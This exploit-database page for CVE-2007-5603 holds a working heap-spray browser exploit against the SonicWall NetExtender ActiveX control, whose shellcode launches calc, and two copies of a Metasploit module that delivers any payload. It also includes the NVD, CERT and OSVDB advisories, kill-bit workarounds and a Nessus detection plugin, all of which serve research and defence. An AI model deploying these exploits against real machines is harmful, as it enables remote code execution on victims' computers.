SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit
2007-11-01T00:00:00
ID EDB-ID:4594 Type exploitdb Reporter krafty Modified 2007-11-01T00:00:00
Description
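SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit (CVE-2007-5603). Remote exploit for the Windows platform. The NVD entry quoted further down this page describes the flaw as a stack-based buffer overflow in the NetExtender NELaunchCtrl ActiveX control, reached through the second argument to the AddRouteEntry method and fixed in control versions 2.1.0.51 and 2.5.0.56.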
<!--
SonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.
by krafty
greets to SK, muts, halvar, grugq, and all the ethnical hackers
sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
Bring back the days of technotronic and r00tshell! Freedom.
poc: launches calculator.
Tested with IE6 XP SP2. I'm sure it works with IE7 and Vista and all
that jing-bang.
-->
<!--
Analyst notes on the listing below. Every statement about the vulnerability
and its fixes is taken from the advisories quoted on this page.

What it does: instantiates the SonicWall NetExtender NELaunchCtrl ActiveX
control by CLSID and calls its AddRouteEntry method from page script
(CVE-2007-5603).

Root cause (NVD): stack-based buffer overflow reached through a long string
in the second argument to AddRouteEntry.

Fixed control versions: 2.1.0.51 and, for 2.5.x, 2.5.0.56 according to NVD
and the Nessus plugin. The CERT/CC note cites 2.5.0.53 for the same branch,
so check installed clients against the higher number.

Workarounds (CERT/CC): set the kill bit for this CLSID, or disable ActiveX
in the Internet Zone. Clients only receive the fixed control when they
connect to an updated SSL-VPN unit, so unmanaged or rarely connected
machines can stay on a vulnerable build.

Detection: content inspection can key on this CLSID appearing together with
a scripted AddRouteEntry call. The Nessus plugin quoted on this page checks
the installed file version and the kill bit.
-->
<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>
<script>
// Payload bytes in %u-encoded form. The author's header calls this a proof
// of concept that launches calculator; the trailing units decode to the
// ASCII text "calc.exe", which is consistent with that description.
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000");
// Filler string: eight 0x9090 units to start with.
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
// Doubled on every pass until the string holds at least 0xc0000 characters.
do {
spray += spray;
} while(spray.length < 0xc0000);
// 50 array slots each keep a filler + payload string referenced, so many
// large copies stay allocated in the browser process (the heap-spray
// pattern). `memory`, `i` and `buf` are implicit globals.
memory = new Array();
for(i = 0; i < 50; i++)
memory[i] = spray + shellcode;
// Argument string: 50 repetitions of four 0x05 characters, 200 in total.
// NOTE(review): the repeated 0x05 value is presumably meant to resolve into
// the filled region above; that is an inference, the page does not state it.
buf = "";
for(i = 0; i < 50; i++)
buf += unescape("%05%05%05%05");
// The oversized string goes in as the second argument, the parameter NVD
// names as the overflow vector; the first argument is an empty string.
nelx.AddRouteEntry("", buf);
</script>
# milw0rm.com [2007-11-01]
{"id": "EDB-ID:4594", "hash": "a40331f604521b101aa276cecd8bd33b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit", "description": "SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit. CVE-2007-5603. Remote exploit for windows platform", "published": "2007-11-01T00:00:00", "modified": "2007-11-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/4594/", "reporter": "krafty", "references": [], "cvelist": ["CVE-2007-5603"], "lastseen": "2016-01-31T21:18:09", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5603"]}, {"type": "osvdb", "idList": ["OSVDB:39069"]}, {"type": "exploitdb", "idList": ["EDB-ID:16616"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83233"]}, {"type": "cert", "idList": ["VU:298521"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/SONICWALL_ADDROUTEENTRY"]}, {"type": "nessus", "idList": ["SONICWALL_NELX_ACTIVEX_OVERFLOW.NASL"]}], "modified": "2016-01-31T21:18:09"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4594/", "sourceData": "<!--\n\nSonicWall SSL-VPN NeLaunchCtrl ActiveX Control exploit.\n\nby krafty\n\ngreets to SK, muts, halvar, grugq, and all the ethnical hackers\n\nsux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.\n\nBring back the days of technotronic and r00tshell! Freedom.\n\npoc: launches calculator.\nTested with IE6 XP SP2. 
I'm sure it works with IE7 and Vista and all\nthat jing-bang.\n\n-->\n\n\n<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='nelx' /></object>\n\n<script>\n\nvar shellcode = unescape(\"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u2065%u0000\");\n\nvar spray = unescape(\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\");\ndo {\n spray += spray;\n} while(spray.length < 0xc0000);\n\nmemory = new Array();\n\nfor(i = 0; i < 50; i++)\n memory[i] = spray + shellcode;\n\nbuf = \"\";\nfor(i = 0; i < 50; i++)\n buf += unescape(\"%05%05%05%05\");\n\nnelx.AddRouteEntry(\"\", buf);\n\n</script>\n\n# milw0rm.com [2007-11-01]\n", "osvdbidlist": ["39069"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-16T10:51:38", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control before 2.1.0.51, and 2.5.x before 2.5.0.56, allows remote attackers to execute arbitrary code via a long string in the second argument to the AddRouteEntry method.", "modified": "2018-10-15T17:45:44", "published": "2007-11-05T13:46:00", "id": "CVE-2007-5603", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5603", "title": "CVE-2007-5603", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018891\n[Secunia Advisory ID:27469](https://secuniaresearch.flexerasoftware.com/advisories/27469/)\nOther Advisory URL: http://www.sec-consult.com/fileadmin/Advisories/20071101-0_sonicwall_multiple.txt\nOther Advisory URL: http://www.sec-consult.com/303.html\nOther Advisory URL: http://securityreason.com/securityalert/3342\nKeyword: clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30\nISS X-Force ID: 38220\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4594\nFrSIRT Advisory: ADV-2007-3696\n[CVE-2007-5603](https://vulners.com/cve/CVE-2007-5603)\nCERT VU: 298521\nBugtraq ID: 26288\n", "modified": "2007-11-01T00:00:00", "published": "2007-11-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39069", "id": "OSVDB:39069", "title": "SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX AddRouteEntry Method Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:44", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": 
"https://packetstormsecurity.com/files/83233/SonicWall-SSL-VPN-NetExtender-ActiveX-Control-Buffer-Overflow.html", "id": "PACKETSTORM:83233", "type": "packetstorm", "title": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in SonicWall SSL-VPN NetExtender. \nBy sending an overly long string to the \"AddRouteEntry()\" method located \nin the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute \narbitrary code. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-5603'], \n[ 'OSVDB', '39069'], \n[ 'URL', 'http://www.sec-consult.com/303.html' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'IE 6 / Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } ], # 11/01/07 \n], \n'DisclosureDate' => 'Nov 1 2007', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Randomize some things \nvname = rand_text_alpha(rand(100) + 1) \nstrname = rand_text_alpha(rand(100) + 1) \n \n# Set the exploit buffer \nsploit = rand_text_english(36) + [target.ret].pack('V') \nsploit << p.encoded + rand_text_english(1024 - p.encoded.length) \n \n# Build out the message \ncontent = %Q| \n<html> \n<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object> \n<script language='javascript'> \nvar #{vname} = document.getElementById('#{vname}'); \nvar #{strname} = new String('#{sploit}'); \n#{vname}.AddRouteEntry(#{strname}, #{vname}); \n</script> \n</html> \n| \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83233/sonicwall_addrouteentry.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T06:05:33", "bulletinFamily": "exploit", "description": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow. CVE-2007-5603. 
Remote exploit for windows platform", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "EDB-ID:16616", "href": "https://www.exploit-db.com/exploits/16616/", "type": "exploitdb", "title": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", "sourceData": "##\r\n# $Id: sonicwall_addrouteentry.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\r\n\t\t\t\tBy sending an overly long string to the \"AddRouteEntry()\" method located\r\n\t\t\t\tin the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5603'],\r\n\t\t\t\t\t[ 'OSVDB', '39069'],\r\n\t\t\t\t\t[ 'URL', 'http://www.sec-consult.com/303.html' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'IE 6 / Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } 
], # 11/01/07\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 1 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Randomize some things\r\n\t\tvname\t= rand_text_alpha(rand(100) + 1)\r\n\t\tstrname\t= rand_text_alpha(rand(100) + 1)\r\n\r\n\t\t# Set the exploit buffer\r\n\t\tsploit = rand_text_english(36) + [target.ret].pack('V')\r\n\t\tsploit << p.encoded + rand_text_english(1024 - p.encoded.length)\r\n\r\n\t\t# Build out the message\r\n\t\tcontent = %Q|<html>\r\n\t\t\t<object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object>\r\n\t\t\t<script language='javascript'>\r\n\t\t\tvar #{vname} = document.getElementById('#{vname}');\r\n\t\t\tvar #{strname} = new String('#{sploit}');\r\n\t\t\t#{vname}.AddRouteEntry(#{strname}, #{vname});\r\n\t\t\t</script>\r\n\t\t\t</html>\r\n\t\t\t|\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16616/"}], "metasploit": [{"lastseen": "2019-01-28T16:08:24", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. 
By sending an overly long string to the \"AddRouteEntry()\" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code.", "modified": "2017-07-24T13:26:21", "published": "2007-11-01T23:15:34", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/SONICWALL_ADDROUTEENTRY", "href": "", "type": "metasploit", "title": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-5603'],\n [ 'OSVDB', '39069'],\n [ 'URL', 'http://www.sec-consult.com/303.html' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'IE 6 / Windows XP SP2 Pro English', { 'Ret' => 0x7e497c7b } ], # 11/01/07\n ],\n 'DisclosureDate' => 'Nov 1 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = 
rand_text_english(36) + [target.ret].pack('V')\n sploit << p.encoded + rand_text_english(1024 - p.encoded.length)\n\n # Build out the message\n content = %Q|<html>\n <object classid='clsid:6EEFD7B1-B26C-440D-B55A-1EC677189F30' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.AddRouteEntry(#{strname}, #{vname});\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/sonicwall_addrouteentry.rb"}], "cert": [{"lastseen": "2018-12-25T20:18:34", "bulletinFamily": "info", "description": "### Overview \n\nThe SonicWall NetExtender NELaunchCtrl ActiveX control contains a stack buffer overflow, which could allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nSonicWall NetExtender is an SSL VPN client that is implemented by using an ActiveX control. The NELaunchCtrl ActiveX control, which is provided by `NELaunchX.dll`, contains a stack buffer overflow in the `AddRouteEntry()` method.\n\nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the user on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis vulnerability is addressed in the client software provided by the 2.5 firmware for the SonicWall NetExtender 4000 and 2000 series VPN units. 
This update provides version 2.5.0.53 of the NELaunchCtrl ActiveX control. The vulnerability is also addressed by the 2.1 Patch Build for the SonicWall NetExtender 200 series VPN units. This update provides version 2.1.0.51 of the NELaunchCtrl ActiveX control. These updates can be obtained from the [SonicWall Support](<http://www.sonicwall.com/us/643.htm>) page. Please note that the client systems must connect to a NetExtender SSL VPN unit to obtain the fixed control. If you are unable to obtain a fixed version of the control, please consider the following workarounds: \n \n--- \n \n \n**Disable the NELaunchCtrl ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{6EEFD7B1-B26C-440D-B55A-1EC677189F30}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\``{6EEFD7B1-B26C-440D-B55A-1EC677189F30}``]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.cert.org/tech_tips/securing_browser/#Internet_Explorer>)\" document. \n \n--- \n \n### Vendor Information\n\n298521\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### __ __ SonicWall \n\nNotified: September 20, 2007 Updated: November 05, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`SSL-VPN 200 Platform \n-------------------- \nThe fix was made publicly available on 7/20/07 with the web-post of \n2.1.0.0-8sv. The web-posted firmware contains version 2.1.0.51 of the \nNELaunchCtrl ActiveX control, which fixed the issue. \n \nSSL-VPN 2000/4000 Platform \n-------------------------- \nThe fix was first made publicly available on 10/22/07 with the web-post \nof 2.5.0.0-9sv. The web-posted firmware contains version 2.5.0.53 of \nthe NELaunchCtrl ActiveX control, which fixed the issue.`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nThese updates can be obtained from the [SonicWall Support](<http://www.sonicwall.com/us/643.htm>) page. Please note that the client systems must connect to a NetExtender SSL VPN unit to obtain the fixed control. If you are unable to obtain a fixed version of the control, please disable the ActiveX control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298521 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.sec-consult.com/fileadmin/Advisories/20071101-0_sonicwall_multiple.txt>\n * <http://www.sonicwall.com/us/643.htm>\n * <http://secunia.com/advisories/27469/>\n\n### Credit\n\nThis vulnerability was reported by Will Dormann of the CERT/CC. It was also independently discovered by lofi42. \n\nThis document was written by Will Dormann. 
\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-5603](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5603>) \n---|--- \n**Severity Metric:****** | 25.92 \n**Date Public:** | 2007-11-01 \n**Date First Published:** | 2007-11-02 \n**Date Last Updated: ** | 2009-04-13 17:15 UTC \n**Document Revision: ** | 9 \n", "modified": "2009-04-13T17:15:00", "published": "2007-11-02T00:00:00", "id": "VU:298521", "href": "https://www.kb.cert.org/vuls/id/298521", "type": "cert", "title": "SonicWall NetExtender NELaunchCtrl ActiveX control stack buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:10:16", "bulletinFamily": "scanner", "description": "The remote host contains the 'NELaunchCtrl' ActiveX control included with the SonicWALL NetExtender VPN client software. \n\nThe version of this control installed on the remote host fails to validate arguments to several methods, such as 'AddRouteEntry', 'serverAddress', 'sessionId', 'clientIPLower', etc. 
If a remote attacker can trick a user on the affected host into visiting a specially crafted web page, the attacker could leverage these issues to overflow a buffer and execute arbitrary code on the host subject to the user's privileges.", "modified": "2018-11-15T00:00:00", "id": "SONICWALL_NELX_ACTIVEX_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27618", "published": "2007-11-03T00:00:00", "title": "SonicWALL SSL-VPN NetExtender NELaunchCtrl ActiveX Control Multiple Overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27618);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2007-5603\", \"CVE-2007-5814\");\n script_bugtraq_id(26288);\n script_xref(name:\"CERT\", value:\"298521\");\n\n script_name(english:\"SonicWALL SSL-VPN NetExtender NELaunchCtrl ActiveX Control Multiple Overflows\");\n script_summary(english:\"Checks version of NELaunchCtrl ActiveX control\"); \n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nbuffer overflow vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains the 'NELaunchCtrl' ActiveX control included\nwith the SonicWALL NetExtender VPN client software. \n\nThe version of this control installed on the remote host fails to\nvalidate arguments to several methods, such as 'AddRouteEntry',\n'serverAddress', 'sessionId', 'clientIPLower', etc. 
If a remote\nattacker can trick a user on the affected host into visiting a\nspecially crafted web page, the attacker could leverage these issues \nto overflow a buffer and execute arbitrary code on the host subject to\nthe user's privileges.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/483097/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Nov/12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.1.0.51 / 2.5.0.56 or later of the control.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/11/03\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/11/01\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:sonicwall:ssl_vpn\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif 
(!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = \"{6EEFD7B1-B26C-440D-B55A-1EC677189F30}\";\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n # Check its version.\n ver = activex_get_fileversion(clsid:clsid);\n if (\n ver && \n (\n ver =~ \"^[01]\\.\" ||\n (\n ver =~ \"^2\\.1\\.\" && \n activex_check_fileversion(clsid:clsid, fix:\"2.1.0.51\") == TRUE\n ) ||\n (\n ver =~ \"^2\\.5\\.\" && \n activex_check_fileversion(clsid:clsid, fix:\"2.5.0.56\") == TRUE\n )\n )\n )\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"Version \", ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"Version \", ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report) security_hole(port:kb_smb_transport(), extra:report);\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}